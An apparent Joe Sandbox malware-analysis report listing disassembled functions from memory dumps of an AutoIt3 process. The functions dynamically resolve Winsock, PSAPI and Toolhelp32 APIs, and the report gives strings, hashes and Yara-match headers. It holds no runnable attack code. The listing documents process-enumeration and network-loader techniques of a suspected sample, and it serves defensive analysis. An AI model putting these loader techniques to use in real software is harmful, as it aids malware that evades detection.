String ID: WSACleanup$WSAGetLastError$WSAIoctl$WSAStartup$__WSAFDIsSet$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyaddr$gethostbyname$gethostname$getnameinfo$getpeername$getprotobyname$getprotobynumber$getservbyname$getservbyport$getsockname$getsockopt$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$recvfrom$select$send$sendto$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll
API String ID: 2238633743-3535293950
Opcode ID: 40aa35a2c2cba7113fd00312435571f34b429cd6f7ac6d245177968ac9763d93
Instruction ID: e3875a7af651e031dc8ceaef359dcb05f9d44bbb90128fbabd7d72e9b82c0e94
Opcode Fuzzy Hash: 40aa35a2c2cba7113fd00312435571f34b429cd6f7ac6d245177968ac9763d93
Instruction Fuzzy Hash: DBB11AB4A06301EFEB20EBF4D885A7677E8EB45214B40856AE540CF790E7B9BC01CF95

Function 0470D802 Relevance: 145.5, APIs: 43, Strings: 40, Instructions: 282libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,0470DC12,?,00000000,0470DC2F), ref: 0470D87C
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 0470D894
GetProcAddress.KERNEL32(00000000,__WSAFDIsSet), ref: 0470D8A6
GetProcAddress.KERNEL32(00000000,closesocket), ref: 0470D8B8
GetProcAddress.KERNEL32(00000000,ioctlsocket), ref: 0470D8CA
GetProcAddress.KERNEL32(00000000,WSAGetLastError), ref: 0470D8DC
GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0470D8EE
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 0470D900
GetProcAddress.KERNEL32(00000000,accept), ref: 0470D912
GetProcAddress.KERNEL32(00000000,bind), ref: 0470D924
GetProcAddress.KERNEL32(00000000,connect), ref: 0470D936
GetProcAddress.KERNEL32(00000000,getpeername), ref: 0470D948
GetProcAddress.KERNEL32(00000000,getsockname), ref: 0470D95A
GetProcAddress.KERNEL32(00000000,getsockopt), ref: 0470D96C
GetProcAddress.KERNEL32(00000000,htonl), ref: 0470D97E
GetProcAddress.KERNEL32(00000000,htons), ref: 0470D990
GetProcAddress.KERNEL32(00000000,inet_addr), ref: 0470D9A2
GetProcAddress.KERNEL32(00000000,inet_ntoa), ref: 0470D9B4
GetProcAddress.KERNEL32(00000000,listen), ref: 0470D9C6
GetProcAddress.KERNEL32(00000000,ntohl), ref: 0470D9D8
GetProcAddress.KERNEL32(00000000,ntohs), ref: 0470D9EA
GetProcAddress.KERNEL32(00000000,recv), ref: 0470D9FC
GetProcAddress.KERNEL32(00000000,recvfrom), ref: 0470DA0E
GetProcAddress.KERNEL32(00000000,select), ref: 0470DA20
GetProcAddress.KERNEL32(00000000,send), ref: 0470DA32
GetProcAddress.KERNEL32(00000000,sendto), ref: 0470DA44
GetProcAddress.KERNEL32(00000000,setsockopt), ref: 0470DA56
GetProcAddress.KERNEL32(00000000,shutdown), ref: 0470DA68
GetProcAddress.KERNEL32(00000000,socket), ref: 0470DA7A
GetProcAddress.KERNEL32(00000000,gethostbyaddr), ref: 0470DA8C
GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 0470DA9E
GetProcAddress.KERNEL32(00000000,getprotobyname), ref: 0470DAB0
GetProcAddress.KERNEL32(00000000,getprotobynumber), ref: 0470DAC2
GetProcAddress.KERNEL32(00000000,getservbyname), ref: 0470DAD4
GetProcAddress.KERNEL32(00000000,getservbyport), ref: 0470DAE6
GetProcAddress.KERNEL32(00000000,gethostname), ref: 0470DAF8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0470DB0A
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 0470DB1C
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 0470DB2E
LoadLibraryA.KERNEL32(wship6.dll,00000000,getnameinfo,00000000,freeaddrinfo,00000000,getaddrinfo,00000000,gethostname,00000000,getservbyport,00000000,getservbyname,00000000,getprotobynumber,00000000), ref: 0470DB6C
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0470DB8A
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 0470DB9F
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 0470DBB4

Strings

WSAGetLastError, xrefs: 0470D8D4
__WSAFDIsSet, xrefs: 0470D89E
gethostbyaddr, xrefs: 0470DA84
closesocket, xrefs: 0470D8B0
WSAStartup, xrefs: 0470D8E6
listen, xrefs: 0470D9BE
accept, xrefs: 0470D90A
htonl, xrefs: 0470D976
shutdown, xrefs: 0470DA60
WSACleanup, xrefs: 0470D8F8
sendto, xrefs: 0470DA3C
getprotobyname, xrefs: 0470DAA8
inet_addr, xrefs: 0470D99A
select, xrefs: 0470DA18
getsockname, xrefs: 0470D952
ws2_32.dll, xrefs: 0470D836
gethostname, xrefs: 0470DAF0
recv, xrefs: 0470D9F4
gethostbyname, xrefs: 0470DA96
bind, xrefs: 0470D91C
inet_ntoa, xrefs: 0470D9AC
freeaddrinfo, xrefs: 0470DB14, 0470DB94
getaddrinfo, xrefs: 0470DB02, 0470DB7F
htons, xrefs: 0470D988
wship6.dll, xrefs: 0470DB67
recvfrom, xrefs: 0470DA06
ioctlsocket, xrefs: 0470D8C2
send, xrefs: 0470DA2A
setsockopt, xrefs: 0470DA4E
socket, xrefs: 0470DA72
getservbyport, xrefs: 0470DADE
ntohl, xrefs: 0470D9D0
ntohs, xrefs: 0470D9E2
getprotobynumber, xrefs: 0470DABA
getservbyname, xrefs: 0470DACC
connect, xrefs: 0470D92E
getsockopt, xrefs: 0470D964
WSAIoctl, xrefs: 0470D88C
getnameinfo, xrefs: 0470DB26, 0470DBA9
getpeername, xrefs: 0470D940

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: WSACleanup$WSAGetLastError$WSAIoctl$WSAStartup$__WSAFDIsSet$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyaddr$gethostbyname$gethostname$getnameinfo$getpeername$getprotobyname$getprotobynumber$getservbyname$getservbyport$getsockname$getsockopt$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$recvfrom$select$send$sendto$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll
API String ID: 2238633743-3535293950
Opcode ID: 0e10589c382d32b557799291fafc64871a5f1131a5d0ee402c410dda686dc568
Instruction ID: 92a947ecc855dda111cc085f4d10ce0f56470db6b48370462f9e67e3a10cc61b
Opcode Fuzzy Hash: 0e10589c382d32b557799291fafc64871a5f1131a5d0ee402c410dda686dc568
Instruction Fuzzy Hash: 5CB11BB4A06301EFEB20EBF4D885A7677E8EB45614B40856AE540CF790E7B9BC01CF95

Function 047187EC Relevance: 75.4, APIs: 24, Strings: 19, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PSAPI.dll,?,04718B69), ref: 04718800
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0471881C
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0471882E
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 04718840
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 04718852
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 04718864
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 04718876
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 04718888
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0471889A
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 047188AC
GetProcAddress.KERNEL32(00000000,EmptyWorkingSet), ref: 047188BE
GetProcAddress.KERNEL32(00000000,QueryWorkingSet), ref: 047188D0
GetProcAddress.KERNEL32(00000000,InitializeProcessForWsWatch), ref: 047188E2
GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 047188F4
GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 04718906
GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 04718918
GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 0471892A
GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 0471893C
GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 0471894E
GetProcAddress.KERNEL32(00000000,GetMappedFileNameW), ref: 04718960
GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameW), ref: 04718972

Strings

GetModuleFileNameExW, xrefs: 04718892
GetModuleFileNameExA, xrefs: 0471884A, 0471886E
GetDeviceDriverFileNameW, xrefs: 0471897C
GetDeviceDriverBaseNameA, xrefs: 047188FE, 04718934
InitializeProcessForWsWatch, xrefs: 047188DA
GetModuleBaseNameW, xrefs: 04718880
EnumProcessModules, xrefs: 04718826
PSAPI.dll, xrefs: 047187FB
GetDeviceDriverFileNameA, xrefs: 04718910, 04718946
EnumDeviceDrivers, xrefs: 0471898E
GetModuleBaseNameA, xrefs: 04718838, 0471885C
GetModuleInformation, xrefs: 047188A4
GetProcessMemoryInfo, xrefs: 047189A0
EnumProcesses, xrefs: 04718814
EmptyWorkingSet, xrefs: 047188B6
GetMappedFileNameW, xrefs: 04718958
QueryWorkingSet, xrefs: 047188C8
GetDeviceDriverBaseNameW, xrefs: 0471896A
GetMappedFileNameA, xrefs: 047188EC, 04718922

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
API String ID: 2238633743-2267155864
Opcode ID: e95bfdff4266d32e64c6df79ccc67918c9b567b9c1d8d52622c1cc3b51f14003
Instruction ID: 795667da5821bce864fc59850065d3eb5d409a35707873cb81daf03e364dd3ad
Opcode Fuzzy Hash: e95bfdff4266d32e64c6df79ccc67918c9b567b9c1d8d52622c1cc3b51f14003
Instruction Fuzzy Hash: 4F4129F0A45711AFEB10FFB8DCC5D6637A8EB0560434145AAF180CF7A5E6B9B8018F96

Function 046FDD68 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,046FDFEF,?,?,047247C0,00000000,0472489E,?,?,?,?,?,0470ACDD,00000000,0470B1B3), ref: 046FDD7C
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 046FDD94
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 046FDDA6
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 046FDDB8
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 046FDDCA
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 046FDDDC
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 046FDDEE
GetProcAddress.KERNEL32(00000000,Process32First), ref: 046FDE00
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 046FDE12
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 046FDE24
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 046FDE36
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 046FDE48
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 046FDE5A
GetProcAddress.KERNEL32(00000000,Module32First), ref: 046FDE6C
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 046FDE7E
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 046FDE90
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 046FDEA2

Strings

Process32FirstW, xrefs: 046FDE1C
Heap32ListNext, xrefs: 046FDDB0
Process32Next, xrefs: 046FDE0A
Module32First, xrefs: 046FDE64
Toolhelp32ReadProcessMemory, xrefs: 046FDDE6
CreateToolhelp32Snapshot, xrefs: 046FDD8C
Process32First, xrefs: 046FDDF8
Module32FirstW, xrefs: 046FDE88
kernel32.dll, xrefs: 046FDD77
Module32NextW, xrefs: 046FDE9A
Thread32Next, xrefs: 046FDE52
Thread32First, xrefs: 046FDE40
Process32NextW, xrefs: 046FDE2E
Heap32Next, xrefs: 046FDDD4
Heap32ListFirst, xrefs: 046FDD9E
Heap32First, xrefs: 046FDDC2
Module32Next, xrefs: 046FDE76

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 5d7858629293ffbb58d8c9edb551f03cec778bd3708caaa6a61b1ef3ad13aa60
Instruction ID: 828df883131f8affa7916f0ad2bc2125f8d7aef71ab6fcbcb569b807df0850fe
Opcode Fuzzy Hash: 5d7858629293ffbb58d8c9edb551f03cec778bd3708caaa6a61b1ef3ad13aa60
Instruction Fuzzy Hash: 453114B0A06311AFEB00EFB4DC88E6677ACEB0560474049A9F281CF655F3B9B801CF95

Function 00CCABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00CCAC55
GetSysColorBrush.USER32(0000000F), ref: 00CCAC86
GetSysColor.USER32(0000000F), ref: 00CCAC92
SetBkColor.GDI32(?,000000FF), ref: 00CCACAC
SelectObject.GDI32(?,?), ref: 00CCACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00CCACE6
GetSysColor.USER32(00000010), ref: 00CCACEE
CreateSolidBrush.GDI32(00000000), ref: 00CCACF5
FrameRect.USER32(?,?,00000000), ref: 00CCAD04
DeleteObject.GDI32(00000000), ref: 00CCAD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00CCAD56
FillRect.USER32(?,?,?), ref: 00CCAD88
GetWindowLongW.USER32(?,000000F0), ref: 00CCADB3

Part of subcall function 00CCAF18: GetSysColor.USER32(00000012), ref: 00CCAF51
Part of subcall function 00CCAF18: SetTextColor.GDI32(?,?), ref: 00CCAF55
Part of subcall function 00CCAF18: GetSysColorBrush.USER32(0000000F), ref: 00CCAF6B
Part of subcall function 00CCAF18: GetSysColor.USER32(0000000F), ref: 00CCAF76
Part of subcall function 00CCAF18: GetSysColor.USER32(00000011), ref: 00CCAF93
Part of subcall function 00CCAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCAFA1
Part of subcall function 00CCAF18: SelectObject.GDI32(?,00000000), ref: 00CCAFB2
Part of subcall function 00CCAF18: SetBkColor.GDI32(?,00000000), ref: 00CCAFBB
Part of subcall function 00CCAF18: SelectObject.GDI32(?,?), ref: 00CCAFC8
Part of subcall function 00CCAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00CCAFE7
Part of subcall function 00CCAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCAFFE
Part of subcall function 00CCAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00CCB013

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: c8320b5f8252069900cd006160db9124ec95e521b54888726752a8d58bc608b6
Instruction ID: d1d936dea7909d9edac01069279514af900ca24e3f4b6f4a22dac0178a6aa086
Opcode Fuzzy Hash: c8320b5f8252069900cd006160db9124ec95e521b54888726752a8d58bc608b6
Instruction Fuzzy Hash: E8A15A72409305AFD7119F68DC08F6F7BA9FF88325F200A1EF962961A0D731D944CB52

Function 00C527FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00C60FE6: std::exception::exception.LIBCMT ref: 00C6101C
Part of subcall function 00C60FE6: __CxxThrowException@8.LIBCMT ref: 00C61031

__wcsnicmp.LIBCMT ref: 00C5286A
__wcsnicmp.LIBCMT ref: 00C5287E
__wcsnicmp.LIBCMT ref: 00C52896
__wcsnicmp.LIBCMT ref: 00C528AE
__wcsnicmp.LIBCMT ref: 00C528C6
__wcsnicmp.LIBCMT ref: 00C528DE
__wcsnicmp.LIBCMT ref: 00C528F6
__wcsnicmp.LIBCMT ref: 00C5290A
__wcsnicmp.LIBCMT ref: 00C52948
__wcsnicmp.LIBCMT ref: 00C5295C
__wcsnicmp.LIBCMT ref: 00C52970
__wcsnicmp.LIBCMT ref: 00C52984

Strings

#comments-start, xrefs: 00C528F0, 00C52942
Bad directive syntax error, xrefs: 00C8FBD3, 00C8FBF0
#pragma compile, xrefs: 00C52864
#OnAutoItStartRegister, xrefs: 00C528A8
#comments-end, xrefs: 00C5296A
#include, xrefs: 00C528D8
", xrefs: 00C8FB89
#cs, xrefs: 00C52904, 00C52956
#requireadmin, xrefs: 00C52890
#ce, xrefs: 00C5297E
Cannot parse #include, xrefs: 00C8FCE5
', xrefs: 00C8FB9F
#notrayicon, xrefs: 00C52878
#include-once, xrefs: 00C528C0
Unterminated group of comments, xrefs: 00C8FCFA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 9e5f1ba5134a7ba372727785d8a115fc7e1ef489bd9e77ad58a9a155e18af2ae
Instruction ID: 739b35321c53698f4bd84348b7d7f8fc67b8cc828b06c0a92ce920c0b1df4ac4
Opcode Fuzzy Hash: 9e5f1ba5134a7ba372727785d8a115fc7e1ef489bd9e77ad58a9a155e18af2ae
Instruction Fuzzy Hash: 43A1B035A00209ABCB20AF61DC82EBE37B4EF55741F140029FD15AB292EB719F85E759

Function 00CCA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00CCA0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CCA1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00CCA1CC

Strings

0, xrefs: 00CCA209

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 0077fd83fc2cdabd49f180afcc3ad4fba3b999812e3dc5226c12f85149798849
Instruction ID: a6a75bf8b2403c4f689bc110d25dacb2fcca5606cde0af6cc941c28f409a3c50
Opcode Fuzzy Hash: 0077fd83fc2cdabd49f180afcc3ad4fba3b999812e3dc5226c12f85149798849
Instruction Fuzzy Hash: 7702FF30509709AFD725CF18C84DFAABBE4FF89318F04851DF9AA962A1C774DA41CB52

Function 04700148 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 04700151

Part of subcall function 04700110: GetProcAddress.KERNEL32(00000000), ref: 0470012E

Strings

VarCmp, xrefs: 04700267
VarR8FromStr, xrefs: 047002A9
VariantChangeTypeEx, xrefs: 0470015F
VarNeg, xrefs: 04700175
VarXor, xrefs: 04700251
VarCyFromStr, xrefs: 047002D5
VarR4FromStr, xrefs: 04700293
VarBoolFromStr, xrefs: 047002EB
VarMul, xrefs: 047001CD
VarDateFromStr, xrefs: 047002BF
VarBstrFromDate, xrefs: 04700317
VarOr, xrefs: 0470023B
VarMod, xrefs: 0470020F
VarDiv, xrefs: 047001E3
VarBstrFromCy, xrefs: 04700301
VarSub, xrefs: 047001B7
VarBstrFromBool, xrefs: 0470032D
VarI4FromStr, xrefs: 0470027D
oleaut32.dll, xrefs: 0470014C
VarAnd, xrefs: 04700225
VarIdiv, xrefs: 047001F9
VarAdd, xrefs: 047001A1
VarNot, xrefs: 0470018B

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 74246d837524c8d57a7a08065d7ef33539f59e82b2347f2aab511b4db3ff5036
Instruction ID: 902502ac90eca437a8303bb1432c95da2b7dc74cf85f3b5cf7c868e85efe4b62
Opcode Fuzzy Hash: 74246d837524c8d57a7a08065d7ef33539f59e82b2347f2aab511b4db3ff5036
Instruction Fuzzy Hash: C4414D61A06388DB720E6FA978056AA77DCD34823C760C46FB544EF3C5E9B0FC814A6D

Function 04728334 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 04728377
SelectObject.GDI32(?,?), ref: 0472838C
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,04728407,?,?), ref: 047283DB
SelectObject.GDI32(?,?), ref: 047283F5
DeleteObject.GDI32(?), ref: 04728401
CreateCompatibleDC.GDI32(00000000), ref: 04728415
CreateCompatibleBitmap.GDI32(?,?,?), ref: 04728436
SelectObject.GDI32(?,?), ref: 0472844B
SelectPalette.GDI32(?,56080EFF,00000000), ref: 0472845F
SelectPalette.GDI32(?,?,00000000), ref: 04728471
SelectPalette.GDI32(?,00000000,000000FF), ref: 04728486
SelectPalette.GDI32(?,56080EFF,000000FF), ref: 0472849C
RealizePalette.GDI32(?), ref: 047284A8
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 047284CA
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 047284EC
SetTextColor.GDI32(?,00000000), ref: 047284F4
SetBkColor.GDI32(?,00FFFFFF), ref: 04728502
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0472852E
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 04728553
SetTextColor.GDI32(?,?), ref: 0472855D
SetBkColor.GDI32(?,?), ref: 04728567
SelectObject.GDI32(?,00000000), ref: 0472857A
DeleteObject.GDI32(?), ref: 04728583
SelectPalette.GDI32(?,00000000,00000000), ref: 047285A5
DeleteDC.GDI32(?), ref: 047285AE

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: 4ecf9d8f65162fc574aafc1df71e36c3d34fcde40e122523f7ccdfe56d41c324
Instruction ID: e227ebd6a3485167bc80e80ed905aa617048d84fd161637fea7ee072feb96630
Opcode Fuzzy Hash: 4ecf9d8f65162fc574aafc1df71e36c3d34fcde40e122523f7ccdfe56d41c324
Instruction Fuzzy Hash: 0381B2B2A00219AFEB50EFA8CD81EAF77FCEB0C214F110518F658E7240E675ED018B65

Function 00CA498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CA499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CA49C2
_wcscpy.LIBCMT ref: 00CA49F0
_wcscmp.LIBCMT ref: 00CA49FB
_wcscat.LIBCMT ref: 00CA4A11
_wcsstr.LIBCMT ref: 00CA4A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CA4A38
_wcscat.LIBCMT ref: 00CA4A81
_wcscat.LIBCMT ref: 00CA4A88
_wcsncpy.LIBCMT ref: 00CA4AB3

Strings

StringFileInfo\, xrefs: 00CA4A0B
\VarFileInfo\Translation, xrefs: 00CA4A30
04090000, xrefs: 00CA4A6E
DefaultLangCodepage, xrefs: 00CA4A9B
%u.%u.%u.%u, xrefs: 00CA4B16

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 9de919f6a94546b115f823139cffb009f07ffd65e31691a550f2014ee14b2e5a
Instruction ID: 7fd97c4b54caf1fa339747bdf682e00096ab8e9f84ce0f8278321e5ab7729547
Opcode Fuzzy Hash: 9de919f6a94546b115f823139cffb009f07ffd65e31691a550f2014ee14b2e5a
Instruction Fuzzy Hash: 674128726002157BEB24BB749D83FBF776CDF81311F14006AF905A6192EB70AE01A6B6

Function 04748528 Relevance: 31.7, APIs: 4, Strings: 17, Instructions: 219sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000009C4,00000000,04748844,?,?,?,?,00000009,00000000,00000000), ref: 04748582
Sleep.KERNEL32(000009C4,00000000,04748844,?,?,?,?,00000009,00000000,00000000), ref: 04748642

Part of subcall function 047221B8: GetFileAttributesA.KERNEL32(00000000,?,?,?,?,0470AD04,00000000,0470B1B3,?,?,00000000,00000000), ref: 047221FA

